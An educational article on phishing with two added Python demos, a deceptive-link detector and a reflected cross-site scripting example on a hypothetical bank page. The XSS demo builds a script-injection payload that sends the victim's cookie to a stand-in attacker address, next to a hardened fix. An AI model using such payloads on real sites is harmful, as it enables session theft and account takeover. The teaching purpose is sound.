Phishing
By: Serafin Sanchez (4/4/08)
In the IT world, phishing is an attempt to criminally and fraudulently
acquire sensitive information, such as usernames, passwords and credit card
details, by masquerading as a trustworthy entity in an electronic
communication. eBay, PayPal and online banks are common targets. Phishing is
typically carried out by email or instant messaging, and often directs users to
enter details at a website, although phone contact has also been used. Phishing
is an example of the social engineering techniques used to fool users. Attempts
to deal with the growing number of reported phishing incidents include
legislation, user training, public awareness, and technical measures.
Technical deception is designed to make a link in an email, and the forged
site it leads to, appear to belong to the spoofed organization. Misspelled URLs
and the use of subdomains are common tricks used by phishers. In the example
URL http://www.yourbank.example.com/, the bank's name appears only as a
subdomain label; the site actually belongs to whoever controls example.com.
Another common trick is to make the visible anchor text of a link look like a
valid address, such as http://en.wikipedia.org/wiki/Genuine, while the link's
real target (its href) points to the attacker's site. For filter evasion,
phishers have also used images instead of text, making it harder for
anti-phishing filters to detect the wording commonly used in phishing emails.
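As an added example (not part of the original article), the following Python script checks an HTML email body for the two link tricks described above: a brand name buried as a subdomain of an unrelated domain, and anchor text that reads like a URL but whose host differs from where the link really goes. The trusted-domain list and the sample email are constructed for the demo, and the "last two labels" rule used to find the owning domain is a simplification noted in the code.

```python
from __future__ import annotations

from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical list of domains the targeted organisations genuinely use.
TRUSTED_DOMAINS = ("yourbank.com", "paypal.com")


def registrable_domain(host: str) -> str:
    """Reduce a hostname to the part an attacker must actually own.

    Simplifying assumption: the last two labels. A real implementation
    would consult the Public Suffix List so that e.g. bank.co.uk works.
    IP-address hosts are returned unchanged.
    """
    host = host.lower().rstrip(".")
    if host.replace(".", "").isdigit():
        return host
    return ".".join(host.split(".")[-2:])


class LinkCollector(HTMLParser):
    """Collect (href, visible anchor text) pairs from the <a> elements of an HTML body."""

    def __init__(self) -> None:
        super().__init__()
        self.links: list[tuple[str, str]] = []
        self._href: str | None = None
        self._text: list[str] = []

    def handle_starttag(self, tag: str, attrs: list[tuple[str, str | None]]) -> None:
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data: str) -> None:
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag: str) -> None:
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def classify_link(href: str, text: str) -> list[str]:
    """Return the reasons a link looks deceptive; an empty list means nothing was flagged."""
    reasons: list[str] = []
    href_host = (urlparse(href).hostname or "").lower()
    href_domain = registrable_domain(href_host)

    # Trick 1: the brand name appears only as a subdomain label of an unrelated domain,
    # as in www.yourbank.example.com, which belongs to whoever controls example.com.
    if href_domain not in TRUSTED_DOMAINS:
        for brand in TRUSTED_DOMAINS:
            label = brand.split(".")[0]
            if label in href_host.split("."):
                reasons.append(f"brand '{label}' is a subdomain of {href_domain}")

    # Trick 2: the visible anchor text is itself a URL, but its host is not where the link goes.
    if text.startswith(("http://", "https://")):
        text_host = (urlparse(text).hostname or "").lower()
        if registrable_domain(text_host) != href_domain:
            reasons.append(f"anchor text shows {text_host} but the link goes to {href_host}")
    return reasons


def find_deceptive_links(html_body: str) -> dict[str, list[str]]:
    """Map each flagged href in the body to the reasons it was flagged."""
    parser = LinkCollector()
    parser.feed(html_body)
    flagged: dict[str, list[str]] = {}
    for href, text in parser.links:
        reasons = classify_link(href, text)
        if reasons:
            flagged[href] = reasons
    return flagged


# Constructed sample message for the demo (not a real phishing email).
SAMPLE_EMAIL = """
<p>Dear customer, please <a href="http://www.yourbank.example.com/login">verify your account</a>.</p>
<p>Or pay via <a href="http://203.0.113.5/paypal/">https://www.paypal.com/</a> within 24 hours.</p>
<p>Need help? <a href="https://www.yourbank.com/help">https://www.yourbank.com/help</a></p>
"""

if __name__ == "__main__":
    for href, reasons in find_deceptive_links(SAMPLE_EMAIL).items():
        print(href)
        for r in reasons:
            print("   -", r)
```

The first two links in the sample are flagged (subdomain trick and anchor-text mismatch respectively); the third, whose text and target agree and sit on the trusted domain, is not. The check looks only at the link's host, so a brand name placed in the path, as in the second link, is deliberately not treated as evidence either way.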
Website forgery
Once the victim visits the forged website, the deception is not over. Some
phishing scams use JavaScript to alter the browser's address bar, either by
placing a picture of a legitimate URL over the address bar, or by closing the
original address bar and opening a new one that shows the legitimate URL.
An attacker can even use flaws in a trusted website's own scripts against the
victim. These attacks, known as cross-site scripting, are particularly
problematic because they direct the user to sign in at their bank's or
service's own web page, where everything from the web address to the security
certificate appears correct. In reality, the link to the website is crafted so
that the trusted page itself carries out the attack, which is very difficult to
spot without specialist knowledge.
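The cross-site scripting case above, as an added example rather than code from the original article: a hypothetical bank login page at www.bank.example reflects a ?next= parameter into the page. The vulnerable rendering writes the value into an HTML attribute unencoded, so a link that a phisher mails out points at the genuine host (correct address, correct certificate) yet carries the attacker's script; the hardened rendering attribute-encodes the value and accepts only a local path.

```python
from html import escape
from urllib.parse import parse_qs, urlencode, urlsplit

# Hypothetical login page of the trusted site. The ?next= parameter tells the
# site where to send the user after login and is reflected into the form.
LOGIN_TEMPLATE = """<form action="/login" method="post">
<input type="hidden" name="next" value="{next_value}">
<input name="user"> <input name="pass" type="password">
</form>"""


def _next_param(url: str) -> str:
    """Extract the raw ?next= value the way the server would see it."""
    return parse_qs(urlsplit(url).query).get("next", ["/"])[0]


def render_login_vulnerable(url: str) -> str:
    """The flaw: the parameter is written into an HTML attribute unencoded."""
    return LOGIN_TEMPLATE.format(next_value=_next_param(url))


def render_login_fixed(url: str) -> str:
    """Hardened version: attribute-encode the value, and only accept a local path."""
    next_value = _next_param(url)
    if not next_value.startswith("/") or next_value.startswith("//"):
        next_value = "/"  # also blocks open-redirect abuse of the same parameter
    return LOGIN_TEMPLATE.format(next_value=escape(next_value, quote=True))


def phishing_link(attacker_script: str) -> str:
    """The link a phisher would mail out: the bank's real host, carrying the payload."""
    # Close the value attribute and the input tag, inject a script, then reopen
    # an attribute so the rest of the original markup still parses.
    payload = '"><script>' + attacker_script + '</script><input value="'
    return "https://www.bank.example/login?" + urlencode({"next": payload})


def contains_injected_script(page: str) -> bool:
    """True if a literal <script> element made it into the rendered page."""
    return "<script>" in page


if __name__ == "__main__":
    link = phishing_link("document.location='http://203.0.113.5/?c='+document.cookie")
    print("link sent to victim:", link)
    print("vulnerable page contains script:", contains_injected_script(render_login_vulnerable(link)))
    print("fixed page contains script:    ", contains_injected_script(render_login_fixed(link)))
```

Note that the fix does two separate things: the encoding is what stops the script injection, while the local-path rule stops the same parameter being used to bounce the victim to an attacker-controlled site after a genuine login. Rejecting the value is not enough on its own, because a payload beginning with "/" would pass that check and still needs encoding.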
One strategy for combating phishing is to train people to recognize phishing
attempts and to deal with them. Education can be promising, especially where
training provides direct feedback. People can also take steps to avoid phishing
attempts by slightly modifying their browsing habits. When contacted about an
account needing to be verified, it is a sensible precaution to contact the
company from which the email apparently originates to check that the email is
legitimate. Alternatively, the address that the individual knows to be the
company's genuine website can be typed into the address bar of the browser,
rather than trusting any hyperlink in the suspected phishing message.
Nearly all legitimate email messages from companies to their customers contain
an item of information that is not readily available to phishers. Some
companies, for example PayPal, always address their customers by their username
in emails, so if an email addresses the recipient in a generic fashion ("Dear
PayPal customer") it is likely to be an attempt at phishing. Emails from banks
and credit card companies often include partial account numbers. However,
recent research has shown that the public do not typically distinguish between
the first few digits and the last few digits of an account number, a
significant problem since the first few digits are often the same for all
clients of a financial institution. People can be trained to have their
suspicion aroused if the message does not contain any specific personal
information.
Another popular approach to fighting phishing is to maintain a list of known
phishing sites and to check websites against the list. Microsoft's Internet
Explorer 7, Mozilla Firefox 2.0, and Opera all contain this type of
anti-phishing measure. Such a list can only block sites that have already been
reported, so it complements rather than replaces the habits described above.